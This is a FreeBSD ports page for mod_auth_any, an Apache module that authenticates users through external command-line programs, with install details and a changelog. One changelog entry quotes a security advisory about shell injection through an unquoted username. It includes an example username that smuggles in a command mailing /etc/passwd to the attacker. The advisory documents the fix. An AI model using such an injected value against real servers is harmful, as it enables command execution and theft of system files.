mod_auth_any 1.5 www =10

Apache module to use any command line program to authenticate a user
Maintained by: apache@FreeBSD.org
Port Added: 10 Apr 2001 20:28:40

---

---

This module allows you to use any command line program such as
WebNIS to authenticate a user. No more having to keep AuthUserFiles
in sync, or maintain some nasty database. You can even have an
expect script that does ssh authentication. 

CVSWeb : Sources : Distfiles Availability : PortsMon

---

Required To Build: www/apache13
Required To Run: www/apache13

---

To install the port: cd /usr/ports/www/mod_auth_any/ && make install clean
To add the package: pkg_add -r mod_auth_any

---

Configuration Options

     No options to configure

---

Master Sites:

http://www.itlab.musc.edu/webNIS/dist/

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/

- Mark SAFE apache@ ports MAKE_JOBS_SAFE=yes

- remove dead WWW entry

- Convert to new USE_APACHE
- Add SHA256

- prepare removal of www/apache2 in favor of www/apache20 for naming
  consistency
- add entries in UPDATING (for apache22 too)

PR:             ports/78119
Repocopied by:  marcus

- Update to 1.5

- Assign maintainership to freshly created apache@ mailing list

- Update to 1.4
  Now mod_auth_any works with apache2!

- Utilize Makefile.modules.3rd

- SIZEify distinfo

- Update my email address

Approved and reviewed by:    erwin (mentor)

Use the new Apache bits from bsd.port.mk.

Submitted by:   dinoex

[update orphand port] www/mod_auth_any: Update to 1.3.2 and take maintainership

        - update to 1.3.2
        - update WWW
        - take maintainership

PR:             ports/57413
Submitted by:   Clement Laforet <sheepkiller@cultdeadsheep.org>

o Fix vulnerability that allows execution of arbitrary commands on
  the server with the uid of the apache process. Background [1]:

"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."

o Fix this by adding a escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.
o Bump PORTREVISION

Submitted by:   Security Officer (nectar),
                Red Hat Security Response Team <security@redhat.com> [1]
Obtained from:  mod_auth_any CVS [2],
                nalin@redhat.com [3]

De-pkg-comment.

support appache13-modssl by defining APACHE_PORT in /etc/make.conf
others variants of the apache ports can be used too.

Add mod_auth_any 1.0.2, an apache module to use any command line   program to
authenticate a user.    

2 vulnerabilities affecting 8 ports have been reported in the past 14 days

^* - modified, not new

All vulnerabilities